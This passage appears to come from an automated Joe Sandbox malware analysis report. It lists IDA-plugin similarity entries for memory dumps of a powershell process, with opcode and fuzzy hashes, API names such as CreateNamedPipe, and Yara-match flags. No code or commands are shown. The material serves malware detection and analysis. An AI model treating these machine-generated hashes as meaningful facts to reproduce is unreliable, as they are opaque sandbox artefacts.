                                                                                        • API ID: CreateNamedPipe
                                                                                        • String ID:
                                                                                        • API String ID: 2489174969-0
                                                                                        • Opcode ID: ffc033c595a008210ccbf7715394fddec234f51f7fbc04560c83c088a3818f65
                                                                                        • Instruction ID: ceaeb79021019709a80cf56f41e3695013236f0bb55e776f162fdd0b4a340cdc
                                                                                        • Opcode Fuzzy Hash: ffc033c595a008210ccbf7715394fddec234f51f7fbc04560c83c088a3818f65
                                                                                        • Instruction Fuzzy Hash: 9C018739722B80DAEA21CB14F44039A76A1F7AB329F484318D6A8026E5EB7CC00DCB01
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604831158.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34860000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2be427c8391c2b4a4ceca4cd62768dc79b3d9c67150a7d5777c869efca771c5b
                                                                                        • Instruction ID: b3db55539a0bdd6d73b2b9bb12131817b1192a57dabc58181f174deecc88cb8d
                                                                                        • Opcode Fuzzy Hash: 2be427c8391c2b4a4ceca4cd62768dc79b3d9c67150a7d5777c869efca771c5b
                                                                                        • Instruction Fuzzy Hash: 27124931A0DAC94FE7D5DF2888A46B47BE1EF96320F5801BED64DD71A2D92CAC45C341
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                                                        • Instruction ID: 60a9af214e1d4a5e87813029477b7eecc455b97df17585f34c9341cbad4e4148
                                                                                        • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                                                        • Instruction Fuzzy Hash: 9F525FB63149418BD708CB1CE4A177AB7A2F3CAB80F44852AE7978B799CE3DD555CB00
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                                                        • Instruction ID: aaaf275fb3c59db55162f3dc3d619aedc1d75cf6d5e9d4fa819e681c156be8ad
                                                                                        • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                                                        • Instruction Fuzzy Hash: 4A526FB63149818BD708CB1CE4A177AB7E1F3CAB80F44852AE7978B799CA3DD544CB44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3d59eec16ca6a74c122131dd817eb44c8cb8eaf3e157bc23f4a5822c7fdaade5
                                                                                        • Instruction ID: bcc3f286b36a33716b2bdb05a91e39d27427e76f5812c0e7e5c653e4f076f1b2
                                                                                        • Opcode Fuzzy Hash: 3d59eec16ca6a74c122131dd817eb44c8cb8eaf3e157bc23f4a5822c7fdaade5
                                                                                        • Instruction Fuzzy Hash: 9D12C471A08A4D8FDF95EF58C4A5AE97BE1FF66300F1442AAD04DD7252DA38F845CB80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                                                        • Instruction ID: 11ca18f3b20add0e3c1c5d4bfc998218481510ecc7976936e0ed6f0e5b5e9959
                                                                                        • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                                                        • Instruction Fuzzy Hash: 2C5252B630499187D708CB1DE4A177AB7E2F3CEB80F44852AE7968B798CA3DD545CB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                                                        • Instruction ID: 7aa943b6079f3e0f3a2ba4a52cd920b2aac639855ccd3963cdf4ae26d9449d56
                                                                                        • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                                                        • Instruction Fuzzy Hash: 505251B63149808BD708CB1DE4A177AB7E1F3CAB80F44852AE7968B799CA3DD545CF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8e360dd9f58cbef72d4d0178af1861332e9c5774ccf03799f862a72911ac23b5
                                                                                        • Instruction ID: a88b4853c01220dcf4431cb3ce5599c6c160adfe1222990ad5619631e2c53981
                                                                                        • Opcode Fuzzy Hash: 8e360dd9f58cbef72d4d0178af1861332e9c5774ccf03799f862a72911ac23b5
                                                                                        • Instruction Fuzzy Hash: 76F1D371B0CA498FEB95DF5CC4A5AED7BF1FF9A310F14016AC109D7296DA28A842C7C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free
                                                                                        • String ID:
                                                                                        • API String ID: 1294909896-0
                                                                                        • Opcode ID: b36a1ba920152f78f5c99ec07692126c53d6c4271340491167fca338511aeeea
                                                                                        • Instruction ID: 79d2370fc20992e3c22156818f80ceef760436de948059ca901ebcf1cbffe32e
                                                                                        • Opcode Fuzzy Hash: b36a1ba920152f78f5c99ec07692126c53d6c4271340491167fca338511aeeea
                                                                                        • Instruction Fuzzy Hash: 10F1B87A305A42CAEBA2CB3DE4903DE63A1F7A6794F580116DF4D87785EA34C909CB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free
                                                                                        • String ID:
                                                                                        • API String ID: 1294909896-0
                                                                                        • Opcode ID: 39230a270b39aa7a03f1acc75e1d4406c9dcc848d7b32e178703d764618bc014
                                                                                        • Instruction ID: ddb6cfecea78d1aed0ae1d03bfad9265b57c17b36c6a8f6affc2d0f66fd0024a
                                                                                        • Opcode Fuzzy Hash: 39230a270b39aa7a03f1acc75e1d4406c9dcc848d7b32e178703d764618bc014
                                                                                        • Instruction Fuzzy Hash: D7F1C97A305A42C2EB20CB6DD6983DE63E1F7A7788F580115EB5987785EE38C909CB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                                                                                        • Instruction ID: 645e337efcba103bc6f09f2eb181e77c852ceec2160e229eb11243f2675fd884
                                                                                        • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                                                                                        • Instruction Fuzzy Hash: 26E18F7AB11701CBFBA5CB79E8413EA63A1F766344F0C5525DF8A97B82DA3CE4498301
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free
                                                                                        • String ID:
                                                                                        • API String ID: 1294909896-0
                                                                                        • Opcode ID: ded89e024328b8bde828ed96247666ffad05db40743fc4f94469b939fdd8d3ab
                                                                                        • Instruction ID: 9d2d41c7109a199385270d9d8f030b29d4979cfc96c87ad7eb8bd3af65442c56
                                                                                        • Opcode Fuzzy Hash: ded89e024328b8bde828ed96247666ffad05db40743fc4f94469b939fdd8d3ab
                                                                                        • Instruction Fuzzy Hash: EDE1E87A705A42D9EFA2DB3DD4903DE63A1F7A6788F880113DF4D87689EA34C909C741
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free
                                                                                        • String ID:
                                                                                        • API String ID: 1294909896-0
                                                                                        • Opcode ID: fb1a47b38430a28a9ce52fe961906e0d16b6bf2ab463da1186ab792c5180ee2f
                                                                                        • Instruction ID: 472103aff172a479b8c921290fe49d846fc34649718759e1dac1d81b36cab9b8
                                                                                        • Opcode Fuzzy Hash: fb1a47b38430a28a9ce52fe961906e0d16b6bf2ab463da1186ab792c5180ee2f
                                                                                        • Instruction Fuzzy Hash: 01E1F77B305A42D1EB20DB6DD5843EE63A1F7A77C8F880011EA6DC7A89EA35C94DC741
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 743dbd174480e1cb22c03a55f4cd6af6144919d2be01a3fceeee9de6d5f0fe4b
                                                                                        • Instruction ID: a78a2eeea5f275bfe47a1016395f05f64b535dfb2966dd359a67eae27361ef5b
                                                                                        • Opcode Fuzzy Hash: 743dbd174480e1cb22c03a55f4cd6af6144919d2be01a3fceeee9de6d5f0fe4b
                                                                                        • Instruction Fuzzy Hash: 1F718497A0E7C29FF392563858B64A93FD4DF1322470A05F7C694DE0A3DD1D2846A262
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 15024f9aa491f3fab40081af02f78dce006fa5e45c0d76b2ee8106bc41cb3b66
                                                                                        • Instruction ID: 8d58f817437bb685498753e58ecff40ba165faf157ab3824632dace067b9d80c
                                                                                        • Opcode Fuzzy Hash: 15024f9aa491f3fab40081af02f78dce006fa5e45c0d76b2ee8106bc41cb3b66
                                                                                        • Instruction Fuzzy Hash: 8D61ECA3A0D6C3AFE352976CA8F70D937D4DF5323870946B3C584CA0A3ED1D28579691
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ac3a46b03a30990ddb2bd9cf3eaa223aaa37dc1d3138642d39eb39d17606f2f9
                                                                                        • Instruction ID: 837f0647d8f5305a07bbf8f5711889c620a57b92226194a4c3e040a8b9c980d5
                                                                                        • Opcode Fuzzy Hash: ac3a46b03a30990ddb2bd9cf3eaa223aaa37dc1d3138642d39eb39d17606f2f9
                                                                                        • Instruction Fuzzy Hash: C551776770E7C59EE612977C6CF50E97FA0DE9322570905F7C684DB0A3ED0D240A93A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7dd5bdd0290a5bad3f9cb08e822b129d084ef37f476576329e82c15087426a89
                                                                                        • Instruction ID: b189639b4d6027fb3962efea18bb3ff80ca9457e4cab782e43e24d063eee584b
                                                                                        • Opcode Fuzzy Hash: 7dd5bdd0290a5bad3f9cb08e822b129d084ef37f476576329e82c15087426a89
                                                                                        • Instruction Fuzzy Hash: 6551BC6F66E9C189F2B2C91C0EA62CC1FD5E777B14F5F50CA8B504B2C2D646580D5217
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                                                                                        • Instruction ID: 82a9b16db04417b13a6f30aeaebf4920bb471f244064628696c91a29299f7ba3
                                                                                        • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                                                                                        • Instruction Fuzzy Hash: 4471A43A716A40CAEBA0CF29E5403DD73E1F76AB94F185925DB4947795CF38C84C8B42
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e6ffbdb1c1ed5e66d904812257eecbaaa40417cb3d1a321e2144eac078cff1ea
                                                                                        • Instruction ID: 3cf973894c16285234f463b81704750ee70cebca802819587abaabecbc852c35
                                                                                        • Opcode Fuzzy Hash: e6ffbdb1c1ed5e66d904812257eecbaaa40417cb3d1a321e2144eac078cff1ea
                                                                                        • Instruction Fuzzy Hash: 0841B687B1D782EAE692452C5CF60E63FD4DF5336070A05B3C645DA0A3EE0D6C1BA1A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 052196728280c5c0aca8576d94c43bcbe9db0c0682ab746849f352e73f36cb34
                                                                                        • Instruction ID: a974beb5f35c4289ec890a85f578b8a5bb71209b510343fe2fc9898b50f78583
                                                                                        • Opcode Fuzzy Hash: 052196728280c5c0aca8576d94c43bcbe9db0c0682ab746849f352e73f36cb34
                                                                                        • Instruction Fuzzy Hash: 0A413597B0F7E25AE6634A2C58B60D63F95DF531B470E00F7C6C9CA063AD0D1847D6A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                                                        • Instruction ID: dec619449ef76579b9302a0768cc47a2c3129cb11f5d611388a4f8a91d87d145
                                                                                        • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                                                        • Instruction Fuzzy Hash: 4E613DB63156508BD714CB0DE4A066EB7E1F3CD784F88521AE38B87768CA3DD549CB44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2c3933de69a5c45a691f66366f44db72dbce692affb8ab9f513b25421ed8e079
                                                                                        • Instruction ID: 4db5ec2c7fb43a9a47ec214fa30245ead044fe658cfceb898e81aca4ae71f15d
                                                                                        • Opcode Fuzzy Hash: 2c3933de69a5c45a691f66366f44db72dbce692affb8ab9f513b25421ed8e079
                                                                                        • Instruction Fuzzy Hash: 352183A3F3421007979CCA3D9C267BA65D6B394248359C83DF807E7B85D93CED898282
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bec5aa9e0f310a05a7d4e348bf464b8e7399085d368e634c26742dea36e6bc2f
                                                                                        • Instruction ID: 9319dba84b01b88afeccbffaafc6765fca89f44c77d196da734f1b9cbc40fe2c
                                                                                        • Opcode Fuzzy Hash: bec5aa9e0f310a05a7d4e348bf464b8e7399085d368e634c26742dea36e6bc2f
                                                                                        • Instruction Fuzzy Hash: 1D119B6F61F6C04AE2738A284D7619C2F95E7B3B14B8F50CAC790872C3E50908198317
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd184dd02204bbe27ad0a0aa26dad8171a75185b1ecfb51ba8d19fb54c587de9
                                                                                        • Instruction ID: 1864c94af13a5e7aaa8eb1347f568c28c580435d42778789b43504d2276c3254
                                                                                        • Opcode Fuzzy Hash: cd184dd02204bbe27ad0a0aa26dad8171a75185b1ecfb51ba8d19fb54c587de9
                                                                                        • Instruction Fuzzy Hash: B411AC6F61FBC08AE273CA280D7619C6F91E7A3A14B8F50CAD790872C3E5490C198317
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dfe8975137368487851cbf218d3f8ccbec466bdd392a99d66203381082ffde24
                                                                                        • Instruction ID: e283b0445c56ff0a2989312c22b3745f6a2e056c18ad25852a708ca5919aed6d
                                                                                        • Opcode Fuzzy Hash: dfe8975137368487851cbf218d3f8ccbec466bdd392a99d66203381082ffde24
                                                                                        • Instruction Fuzzy Hash: 68D0128FB5E6D283F273C6180D665CC2FC49763654B4E58B6CBA4466D2D509080A9217
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
